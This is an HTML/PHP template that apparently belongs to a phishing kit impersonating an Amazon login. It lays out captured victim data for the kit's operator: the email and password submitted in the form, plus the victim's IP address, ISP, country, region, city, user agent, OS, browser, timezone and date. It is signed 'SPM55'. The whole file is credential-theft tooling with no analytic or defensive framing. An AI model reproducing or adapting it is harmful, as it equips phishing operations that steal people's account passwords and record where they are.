<head>
<style>
body {
font-family:sans-serif;
}
</style>
</head>
<center> 
<div style="background: #000; width: 294; color: #fff; text-align: center; padding: 10px;"><b>AMAZON LOGIN</b></div>
<table style="border-collapse: collapse; border-color: #000; background: #fff" width="100%" border="1">
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>EMAIL</th>
<th style="width: 78%; text-align: center;"><b>'.$_POST['email'].'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>PASSWORD</th>
<th style="width: 78%; text-align: center;"><b>'.$_POST['password'].'</th>
</tr>
</table>
<div style="background: #000; width: 294; color: #fff; text-align: center; padding: 10px;"><b>DEVICE INFORMATION</b></div>
<table style="border-collapse: collapse; border-color: #000; background: #fff" width="100%" border="1">
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>COUNTRY</th>
<th style="width: 78%; text-align: center;"><b>'.$cn.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>REGION</th>
<th style="width: 78%; text-align: center;"><b>'.$regioncity.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>CITY</th>
<th style="width: 78%; text-align: center;"><b>'.$citykota.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>CONTINENT</th>
<th style="width: 78%; text-align: center;"><b>'.$continent.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>USER AGENT</th>
<th style="width: 78%; text-align: center;"><b>'.$user_agent.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>ISP</th>
<th style="width: 78%; text-align: center;"><b>'.$ispuser.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>IP</th>
<th style="width: 78%; text-align: center;"><b>'.$ip.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>OS / BROWSER</th>
<th style="width: 78%; text-align: center;"><b>'.$os.' / '.$br.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>TIMEZONE</th>
<th style="width: 78%; text-align: center;"><b>'.$timezone.'</th> 
</tr>
<tr>
<th style="width: 22%; text-align: left;" height="35px"><b>DATE</th>
<th style="width: 78%; text-align: center;"><b>'.$date.'</th> 
</tr>
</table>
<div style="background: #000; width: 294; color: #fff; text-align: center; padding: 10px;"><b>SPM55</b></div>
</center>